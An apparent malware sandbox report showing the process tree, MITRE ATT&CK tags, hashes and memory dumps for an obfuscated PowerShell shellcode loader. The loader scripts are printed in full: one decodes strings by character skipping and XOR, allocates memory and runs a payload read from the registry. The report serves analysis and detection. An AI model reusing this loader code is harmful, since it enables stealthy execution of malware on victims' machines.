Sa'MiDFe7KeAre3ep9Pa2An9KoFAl9Un2Sa9Bu6Du9Sl6ka9Fu0Ko9GaBCr9AmACo9spDDi9neCIr9MaAAr9se7Te9We6In9Ba2HoCFi0PlDBo3FoCPrEMaDUn3TeDBo7Ha8Kl5Bi9Gi2Kv8Im1LeAHoCPl8Ho5St9Ca2EsDMiDSvBSiAEk9SpDOp8Su5Fl9StCPe9Fa8Di9Sk6ErDAlBBeAKo8soBneAKn9BeDTu8Pe7DeAAm3Wo8Pa7Ov8Jo1koAUnEUbCbl9suCSj9SmATv9Bo9Hy6Co8Gs1Ar9StCCoDDaFBeDUd3noCBa0wiCRe5BiCPo2SeDTiFBaDAc3TeCSa3Di8GrBOpCFo0ClCRe3ZeCPa3ThCKa3ErDDiFpoDSp3UnCHo3Us8TeBMiCRe7ReCIn3viDBiAbo'Am;SoDUeiBaahvgCanUnoMaskotEriHykkoeUdrKleTinKlsOv6Fo5Tr9Se Si`$AsSUncBaaUdrBrsPrdGraAplHeeto2Co0Re9Sc7Be;Pe`$KvSKrcPraPsragsBydPsaTrlUneNu2Co0Fi9Kl8Em Ti=St UgHMaTInBSh Al'DeDBe7Ri9BeCpr8Tr1Al9KlAArDMo3RaCScELiDKw3RaDSu7Ko8Le5Mi9Lo2Bu8Pl1StAEdCNo8Pa5Ha9am2FiDFoDKvBSeAKl9UnDWa8Do5Ha9BiCCi9Ur8Op9Tp6MaDObBJeAAr8AdBTrABo9OlDBi8Gd7UnALa3Un8Pr7Ka8Ba1brAMgEIlCFl9baCGo9PiABa9Hy9Le6No8Pe1Al9LiCEnDAgFBeDRo3VeCam3St8TiBIsCNe2BaCnu3EsCSu3FiCUg3GrCAp3DeCAn3MaDPuFUpDei3FiCTt3No8MeBFrCFe0MiCUn3SoCCh3SuCMy3HuDUnFToDCh3PrCSa3La8UdBKrCBl7GrDAuAUn'Re;DeDSpiDuaNogAdnTroSlsRetNuiUdkDeeStrGleprnFlsSi6fo5Am9Dy Rd`$LuSFocKvaRerNusRidbeaPalEleBe2Ma0In9De8Vi;Im`$BaUSknDiaFosRusNoodicOmiSaaNetVeiElvSueTr=tr(FoGMaeTetUn-MeIBatCoeErmUdPTarSioHopSteAfrHatVmyAd Di-orPKaaErtFyhAb Or'LiHNaKOvCAbUPh:Un\SuDretVisSpeSttPa\ShAObblgnAdoSkrEfmSoaUnlGeiChzKueBedUn'Vi)Cr.BlNcaaKezBoiSkfAfyNe;St`$ArSPrcNiaUnrUnsCadSuaSylereTe2Em0Op9Co9Ph Sp=Hy FlHHaTBoBAu Bu'OxDFo7TaAWa0Re9Se0Sk9Sp2Co8We1Ly8Sa0pr9Ka7Di9Su2Ab9DuFTh9Wo6GaCDj1FaCSi3NyCMaAReDGa3jaCVaEPhDBl3stATi8JuAHy0Na8PrAAn8Wi0el8Ho7Is9Me6Ov9PeEwaDPjDpoBBr0Gr9PoCDa9InDDg8Me5Ex9Ka6Fl8Mu1Tu8Lo7BiACuENoCUn9ErCSj9peBPa5Ta8No1Sl9ReCga9meENyBfr1Fr9Py2Sp8in0Vr9Go6BeCVa5ErCRe7ElASa0Ne8En7Rs8Gi1Ty9TiAKe9skDDr9De4ChDUnBUnDCo7unALe6Un9EnDSu9Un2Fd8Sl0Po8Mi0Ne9PhCEj9In0Tr9MiAUn9Ad2De8De7Kr9GrASt8Ma5In9Ra6sgDSuASe'Ma;KaDseiCaaLigFonOroNosBitBeiKokSteSorNaeDonAmsEl6De5Uf9Hu Bi`$EmSBacDeaTarMesMedReasblRueUb2st0Pa9lu9Fa;No`$GuUrenPraHjsLasskoDecMoiOpaLitChiPrvNoeIt0Ci De=Di BlHAtTDiBRa Vi'SkAJe8TrANo0St8AnAti8El0Bs8Ho7Ad9Sa6Op9VaEReDMeDReASt1Ti8Au6Ko9BlDHa8Fo7va9BeAHj9SlECa9Wa6EuDSpDPoBCaAGr9ApDDi8Sk7Co9Ve6st8Pr1Sp9AnCZe8Se3daAGa0Be9Im6In8Ty1Ls8Cr5Ga9soASk9dj0Po9un6qu8Fl0LeDTrDBeBLsEWo9Br2Tr8Fi1Te8Sc0Vr9SkBKo9Ge2Is9PeFAsAMiERoCUn9SaCBa9HaBDi0Ar9SkCSp8Ta3Ci8SpASaDSnBNoDBr7AaARg0Pe9Ev0Cu9Fr2Ov8Re1Th8Dr0Kj9Et7Ep9Ni2Di9ApFSi9In6UnCSu1HeCTi3KoCAsAtuDflFEkDPe3ChCBe3MuDPrFouDGa3StDSt3TsDPo7UnASl3ni9pr2An9DiFBi9Em2Kn9Lo6Ac9Tr6Te9Fa0Ac9TrBTy9RrAtu9StDTy9PaCTr9InAUn9Mi7Ju9Xe6Ur9Hj2ShCSo0agDPiFDeDSo3DiCHy0feCUd5GaCIs2SaDAcAAv'Ll;RiDGnigeaTogHonGtofosLotChiTakBueAlrHjeYanUfsAm6Vi5th9Au Zy`$RoUInnAaaDrsTisheoTacGaiAlaPitStiErvToeKv0Al;Te`$SksAriUnzSyemo=En`$GeSArcHoaMarpssRedCoamolDreAn2Fi0Pr9Su.recdeoUduPrnSutYa-Te3Ov6Ba1Tr;Ch`$TeUPanDaaFesSvsLaoEscGliHeaDitCoiKovFiemo1Pr An=Gl roHFaTBrBLa Sc'TiAEl8LoASu0Ba8BeAUn8Be0Fr8An7Me9St6Pu9MuEOrDAbDEtARe1Sa8Ka6Dr9EmDPe8ba7Ev9CaAFr9VeEEr9Er6AcDTrDReBJeASi9AnDek8Ex7Ni9An6Ly8Lo1Un9KrCAk8Ex3DhAsu0De9Bl6Ei8No1De8Te5Be9KeALe9Fd0Bl9Fo6In8La0ReDbeDReBPaEPo9St2Su8ne1Ko8So0Un9KoBOv9ps2Th9KoFniAanESlCIn9SvCIs9heBFo0Ou9MoCSu8Un3Un8EnADeDNeBLyDPo7SkAUd0Up9Pr0Op9Fa2Un8Ve1My8Fo0Am9Gl7Ov9To2Pi9StFUn9De6PiCHo1AnCTr3BeCMaAUtDUnFsoDHy3KoCla0KrCBa5AnCSt2ViDWiFViDMa3BeDBr7Pr9DiCSt8Co1No9RhAMeDDiFexDAk3StDPa7Dr8In0co9KeAMa8Va9Pr9Un6DeDUnAUd'Tr;KoDAdianaLagFrnCaoLisDetAuiMokTueForTreLenSkspr6Re5Te9Ge Im`$ChUFunHoaDysBrsUnoLicFniAsaKatByiPhvSjeKr1Ov;Kl`$ChUTrnbnaSasRasTyoSpcLaiFlaEntBeiauvSheOn2Pr Mo=Pa joHDuTOmBMe In'DeDPl7Tr8Sk5Al9Fr2Fl8Pu1AgAEuCTv8Se1Af8Tr6St9CaDBr9VoEWo9St6MlDBh3ElCEnEImDSe3StAEx8RuAMi0Po8OuAEr8Ul0Ca8Bn7Do9Ax6Fl9ToETrDAnDUdAMi1Un8De6Tr9PuDka8Ra7Su9AcAUn9PaEUn9Ta6huDMoDafBFuARi9FiDMe8Ru7Tu9Ud6Un8Pr1Fr9DiCKa8Ou3FrAEm0In9Le6Vi8tr1Ta8vi5Jo9BlACa9Fl0Ov9an6At8Ho0LvDLaDRoBTeEav9Ka2Ej8Be1Ud8Hu0ho9MiBPl9Os2Sk9SkFSkASeEStCKl9PuCAl9SyBin4La9Su6Id8Fr7SyBPa7He9Tu6Eu9SvFSe9Li6Sa9Ke4Sp9Fa2Fo8by7Fl9He6SoBSo5Pr9YdChu8sa1ExBBi5So8Te6Ma9KsDNe9Dr0Su8Ka7Po9BlAst9FiCno9CyDCeAun3Pe9JaCPu9AtAUn9IrDSo8Sv7Ga9ga6To8Po1DiDdyBAkDSa7DoASy3La9Sr2Bu9LeFKa9Sa2sk9Tr6Ka9Wa6Ge9So0Er9FrBUk9drApl9LoDDi9AlCAf9DeABi9Tw7Fa9Un6Re9Se2KoCHe0EuDAnFInDVa3PrDTvBfoBSt4WaBch7RaAag7InDNo3ElBPi3trDAcBBrAHo8FoBCrAIn9GrDLi8Be7SaAKl3St8Tu7Mu8Ap1FjAkoEBrDTvFRaAPl8BiBRaATr9LaDOm8Kd7NoARe3Pa8Pe7Re8Af1MiAabEPrDReABaDKa3neDSkBFoANo8ruANo5Ka9NoCAn9EjAUn9Kr7SkAHyESaDHeASpDMeAUpDAcASt'Mu;CaDAliAsaBegKonSuosmsBrtHuiimkTreAsrLieRenpasPa6Co5Un9La Ud`$FrUSinLeaplsSascyoSkcDaiOvaNotSciAnvReega2ud;Ce`$KvURenUdaOvsCisKroGacPriFraEutbeistvsleSa3Sl Se=Cu StHMiTFlBEk Sk'JoDHa7Sm8Ta5Fe9Ba2St8bi1PeACoCSu8Om1De8Ta6Pn9FoDMu9PeECh9Pr6NoDBrDOpBStALa9TrDDu8sy5Tr9veCKo9Sa8Fr9Ow6GlDUnBOmDdo7Le9ThCRi8Co1Be9SiAFoDFeFToDPi7Ro8Un5De9Sd2Ad8Sv1BaAAlCGa9DeDFo8Fl7ToDKuAPr'Te;KoDLoiSeaAngEnnhooThsHntUniPlkAfeSarDieOvnOvsSa6Ha5Af9Gn Fr`$TrURenAnaAcsVesSeoOpcBliHyaWetCuiEdvBoeMi3ma#Je;""";;Function Unassociative9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Salome = $Salome + $HS.Substring($i, 1); } $Salome;}$Deskriptioners0 = Unassociative9 'InIPsEFoXBo ';$Deskriptioners2 = Unassociative9 'TesTytPlaHoramtAp-EtjPhoHubFo ';$Deskriptioners1= Unassociative9 $Avifaunally;;if([IntPtr]::size -eq 8){ & ($Deskriptioners2) { param($a) powershell $a } -RunAs32 -Argument $Deskriptioners1 | wait-job | Receive-Job;}else{ & ($Deskriptioners0) $Deskriptioners1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5056

\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 243); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$kakiets0=HTB 'A08A8087969EDD979F9F';$kakiets1=HTB 'BE9A90819C809C9587DDA49A9DC0C1DDA69D80929596BD92879A8596BE96879B9C9780';$kakiets2=HTB 'B49687A3819C90B2979781968080';$kakiets3=HTB 'A08A8087969EDDA1869D879A9E96DDBA9D8796819C83A09681859A909680DDBB929D979F96A19695';$kakiets4=HTB '8087819A9D94';$kakiets5=HTB 'B49687BE9C97869F96BB929D979F96';$kakiets6=HTB 'A1A7A08396909A929FBD929E96DFD3BB9A9796B18AA09A94DFD3A386919F9A90';$kakiets7=HTB 'A1869D879A9E96DFD3BE929D92949697';$kakiets8=HTB 'A196959F9690879697B7969F9694928796';$kakiets9=HTB 'BA9DBE969E9C818ABE9C97869F96';$Diagnostikerens650=HTB 'BE8AB7969F9694928796A78A8396';$Diagnostikerens651=HTB 'B09F928080DFD3A386919F9A90DFD3A096929F9697DFD3B29D809AB09F928080DFD3B286879CB09F928080';$Diagnostikerens652=HTB 'BA9D859C9896';$Diagnostikerens653=HTB 'A386919F9A90DFD3BB9A9796B18AA09A94DFD3BD9684A09F9C87DFD3A59A818786929F';$Diagnostikerens654=HTB 'A59A818786929FB29F9F9C90';$Diagnostikerens655=HTB '9D87979F9F';$Diagnostikerens656=HTB 'BD87A3819C87969087A59A818786929FBE969E9C818A';$Diagnostikerens657=HTB 'BAB6AB';$Diagnostikerens658=HTB 'AF';Set-Alias -name Diagnostikerens659 -value $Diagnostikerens657;function fkp {Param ($v_m, $v_p) ;$Scarsdale2090 =HTB 'D785869D9ED3CED3DBA8B28383B79C9E929A9DAEC9C9B0868181969D87B79C9E929A9DDDB49687B28080969E919F9A9680DBDAD38FD3A49B968196DEBC9199969087D388D3D7ACDDB49F9C91929FB28080969E919F8AB092909B96D3DEB29D97D3D7ACDDBF9C9092879A9C9DDDA0839F9A87DBD7B79A92949D9C80879A989681969D80C5C6CBDAA8DEC2AEDDB68286929F80DBD79892989A968780C3DAD38EDADDB49687A78A8396DBD79892989A968780C2DA';Diagnostikerens659 $Scarsdale2090;$Scarsdale2095 = HTB 'D7859281AC948392D3CED3D785869D9EDDB49687BE96879B9C97DBD79892989A968780C1DFD3A8A78A8396A8AEAED3B3DBD79892989A968780C0DFD3D79892989A968780C7DADA';Diagnostikerens659 $Scarsdale2095;$Scarsdale2091 = HTB '81968786819DD3D7859281AC948392DDBA9D859C9896DBD79D869F9FDFD3B3DBA8A08A8087969EDDA1869D879A9E96DDBA9D8796819C83A09681859A909680DDBB929D979F96A19695AEDBBD9684DEBC9199969087D3A08A8087969EDDA1869D879A9E96DDBA9D8796819C83A09681859A909680DDBB929D979F96A19695DBDBBD9684DEBC9199969087D3BA9D87A38781DADFD3DBD785869D9EDDB49687BE96879B9C97DBD79892989A968780C6DADADDBA9D859C9896DBD79D869F9FDFD3B3DBD785AC9EDADADADADFD3D785AC83DADA';Diagnostikerens659 $Scarsdale2091;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Scarsdale2092 = HTB 'D7A5A7B1D3CED3A8B28383B79C9E929A9DAEC9C9B0868181969D87B79C9E929A9DDDB796959A9D96B78A9D929E9A90B28080969E919F8ADBDBBD9684DEBC9199969087D3A08A8087969EDDA196959F9690879A9C9DDDB28080969E919F8ABD929E96DBD79892989A968780CBDADADFD3A8A08A8087969EDDA196959F9690879A9C9DDDB69E9A87DDB28080969E919F8AB1869A9F979681B29090968080AEC9C9A1869DDADDB796959A9D96B78A9D929E9A90BE9C97869F96DBD79892989A968780CADFD3D795929F8096DADDB796959A9D96A78A8396DBD7B79A92949D9C80879A989681969D80C5C6C3DFD3D7B79A92949D9C80879A989681969D80C5C6C2DFD3A8A08A8087969EDDBE869F879A90928087B7969F9694928796AEDA';Diagnostikerens659 $Scarsdale2092;$Scarsdale2093 = HTB 'D7A5A7B1DDB796959A9D96B09C9D8087818690879C81DBD79892989A968780C5DFD3A8A08A8087969EDDA196959F9690879A9C9DDDB0929F9F9A9D94B09C9D85969D879A9C9D80AEC9C9A087929D97928197DFD3D7859281AC839281929E9687968180DADDA09687BA9E839F969E969D8792879A9C9DB59F929480DBD79892989A968780C4DA';Diagnostikerens659 $Scarsdale2093;$Scarsdale2094 = HTB 'D7A5A7B1DDB796959A9D96BE96879B9C97DBD7B79A92949D9C80879A989681969D80C5C6C1DFD3D7B79A92949D9C80879A989681969D80C5C6C0DFD3D7858187DFD3D7859281AC839281929E9687968180DADDA09687BA9E839F969E969D8792879A9C9DB59F929480DBD79892989A968780C4DA';Diagnostikerens659 $Scarsdale2094;$Scarsdale2095 = HTB '81968786819DD3D7A5A7B1DDB08196928796A78A8396DBDA';Diagnostikerens659 $Scarsdale2095 ;}$kk = HTB '9896819D969FC0C1';$Scarsdale2096 = HTB 'D7859281AC8592D3CED3A8A08A8087969EDDA1869D879A9E96DDBA9D8796819C83A09681859A909680DDBE9281809B929FAEC9C9B49687B7969F9694928796B59C81B5869D90879A9C9DA39C9A9D879681DBDB959883D3D79898D3D7B79A92949D9C80879A989681969D80C5C6C7DADFD3DBB4B7A7D3B3DBA8BA9D87A38781AEDFD3A8A6BA9D87C0C1AEDFD3A8A6BA9D87C0C1AEDFD3A8A6BA9D87C0C1AEDAD3DBA8BA9D87A38781AEDADADA';Diagnostikerens659 $Scarsdale2096;$var_nt = fkp $Diagnostikerens655 $Diagnostikerens656;$Scarsdale2097 = HTB 'D7A3929F929696909B9A9D9C9A979692C0D3CED3D7859281AC8592DDBA9D859C9896DBA8BA9D87A38781AEC9C9A996819CDFD3C0C5C2DFD3C38BC0C3C3C3DFD3C38BC7C3DA';Diagnostikerens659 $Scarsdale2097;$Scarsdale2098 = HTB 'D79C819AD3CED3D7859281AC8592DDBA9D859C9896DBA8BA9D87A38781AEC9C9A996819CDFD3C38BC2C3C3C3C3C3DFD3C38BC0C3C3C3DFD3C38BC7DA';Diagnostikerens659 $Scarsdale2098;$Unassociative=(Get-ItemProperty -Path 'HKCU:\Dtset\Abnormalized').Nazify;$Scarsdale2099 = HTB 'D7A09092818097929F96C1C3CAD3CED3A8A08A8087969EDDB09C9D85968187AEC9C9B5819C9EB1928096C5C7A087819A9D94DBD7A69D9280809C909A92879A8596DA';Diagnostikerens659 $Scarsdale2099;$Unassociative0 = HTB 'A8A08A8087969EDDA1869D879A9E96DDBA9D8796819C83A09681859A909680DDBE9281809B929FAEC9C9B09C838ADBD7A09092818097929F96C1C3CADFD3C3DFD3D3D7A3929F929696909B9A9D9C9A979692C0DFD3C0C5C2DA';Diagnostikerens659 $Unassociative0;$size=$Scarsdale209.count-361;$Unassociative1 = HTB 'A8A08A8087969EDDA1869D879A9E96DDBA9D8796819C83A09681859A909680DDBE9281809B929FAEC9C9B09C838ADBD7A09092818097929F96C1C3CADFD3C0C5C2DFD3D79C819ADFD3D7809A8996DA';Diagnostikerens659 $Unassociative1;$Unassociative2 = HTB 'D7859281AC81869D9E96D3CED3A8A08A8087969EDDA1869D879A9E96DDBA9D8796819C83A09681859A909680DDBE9281809B929FAEC9C9B49687B7969F9694928796B59C81B5869D90879A9C9DA39C9A9D879681DBD7A3929F929696909B9A9D9C9A979692C0DFD3DBB4B7A7D3B3DBA8BA9D87A38781AEDFA8BA9D87A38781AEDAD3DBA8A59C9A97AEDADADA';Diagnostikerens659 $Unassociative2;$Unassociative3 = HTB 'D7859281AC81869D9E96DDBA9D859C9896DBD79C819ADFD7859281AC9D87DA';Diagnostikerens659 $Unassociative3#"
4⤵
PID:4924

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
93678e82d776686aa54c42b8a98e6cbc

SHA1
802939dfed99ac74814c4371388b204c5810241d

SHA256
da32a79a8e04cbafb1c5980b3d6225f4705010df5eb45d464cd5bf6b642d7841

SHA512
0b412a1e11c0639d72f6a58c661ecc43da021c010c4d1e66051c5a376ebab287480bbf663345c9bd2a79ec3a35a9788cf04d74d612449f76fe2c87576cd13520

Download Submit
memory/2064-144-0x0000000006650000-0x000000000666E000-memory.dmp

Filesize
120KB

Download
memory/2064-139-0x0000000003050000-0x0000000003086000-memory.dmp

Filesize
216KB

Download
memory/2064-148-0x00000000076B0000-0x00000000076CA000-memory.dmp

Filesize
104KB

Download
memory/2064-147-0x0000000007F10000-0x000000000858A000-memory.dmp

Filesize
6.5MB

Download
memory/2064-141-0x00000000056D0000-0x00000000056F2000-memory.dmp

Filesize
136KB

Download
memory/2064-138-0x0000000000000000-mapping.dmp

Download
memory/2064-143-0x0000000005F90000-0x0000000005FF6000-memory.dmp

Filesize
408KB

Download
memory/2064-140-0x00000000057F0000-0x0000000005E18000-memory.dmp

Filesize
6.2MB

Download
memory/2064-142-0x0000000005770000-0x00000000057D6000-memory.dmp

Filesize
408KB

Download
memory/4924-145-0x0000000000000000-mapping.dmp

Download
memory/5056-137-0x000001EA6D450000-0x000001EA6D65A000-memory.dmp

Filesize
2.0MB

Download
memory/5056-134-0x000001EA6C2C0000-0x000001EA6C2E2000-memory.dmp

Filesize
136KB

Download
memory/5056-132-0x0000000000000000-mapping.dmp

Download
memory/5056-133-0x00007FF8E1C90000-0x00007FF8E2751000-memory.dmp

Filesize
10.8MB

Download
memory/5056-136-0x000001EA6D0C0000-0x000001EA6D236000-memory.dmp

Filesize
1.5MB

Download
memory/5056-135-0x00007FF8E1C90000-0x00007FF8E2751000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing